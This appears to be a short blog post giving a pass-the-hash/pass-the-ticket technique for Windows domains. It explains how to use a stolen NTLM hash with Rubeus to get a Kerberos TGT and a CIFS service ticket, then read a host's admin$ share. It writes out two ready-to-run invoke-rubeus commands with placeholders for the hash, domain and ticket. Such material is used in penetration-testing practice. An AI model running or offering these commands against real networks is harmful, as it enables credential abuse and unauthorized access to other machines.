If we have an NTHASH we can pass it using Rubeus in memory, request a TGT from the DC, then a TGS for a specific servie usch as cifs and read the admin$ of that host.
invoke-rubeus -Command "asktgt /user:rabiullah.syed /ntlm:NTHASH /domain:FQDN /dc:FQDN /ptt"
invoke-rubeus -Command "asktgs /ticket:ADD-TGT-TICKET /service:cifs/FQDN /ptt"
No comments:
Post a Comment